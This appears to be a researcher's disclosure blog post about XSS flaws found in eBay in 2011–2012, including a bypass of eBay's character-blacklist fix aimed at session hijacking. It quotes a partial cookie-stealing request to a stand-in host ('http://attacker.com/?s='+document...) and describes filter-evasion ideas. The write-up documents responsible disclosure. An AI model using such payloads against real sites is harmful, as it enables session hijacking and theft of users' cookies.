2012 - XSS Wide Vulnerability
The payload was injected into a script tag,
bypassing browser's anti-xss filters, and with the ability of full session hijacking and
hacking into eBay's users.
This Time eBay did a great job fixing this vulnerability.
2011 - Vulnerability in all eBay Stores
in 2011 I've Discovered a vulnerability which was quite simple to exploit since user input passed through character blacklist which until my report didn't sanitized input correctly.
2011 - Interesting Wrong Fix -
Bypass: Single Parameter Splitting Injection XSS (alert isn't the goal!)
After my report to the manager of eBay security team, eBay came up with a fix.
this fix contained a server side update to the character blacklist, this time they made it so it will replace the "plus(+)(%2B)" sign and occurrences of "Double Slash(//)" with nothing("") in addition to the filtering of "Brackets (<>)" ,Limiting the parameter's allowed lenght and other forbidden characters.
So, alert? prompt?? could you steal a cookie with alert? can you do it without generating a request to your domain?
A request to the attacker's web listener would normally(there are some techniques to evade that, this bypass comes to show how to deal with a normal real situation) require the use of double slash "plus" sign and long payload. i.e 'http://attacker.com/?s='+document.____ so it may seem like a partial but anti-session hijacking fix.
After working on this filtering I came up with a modified payload which could be used to bypass the filtering and generate a requests to an attacker's website with the user's sensitive web elements/objects! (including cookie!), then I made a video of full-session hijacking.
the reason I am posting about this issue is the interesting vector of my bypass.
eBay did and still doing a great job as they take great care for security, I thank them for that.
I am pleased I could help eBay's security team making eBay's users and customers a bit more secure.
For all of my reports (2011-2012) and security assistance to eBay, eBay gave their special appreciation ;)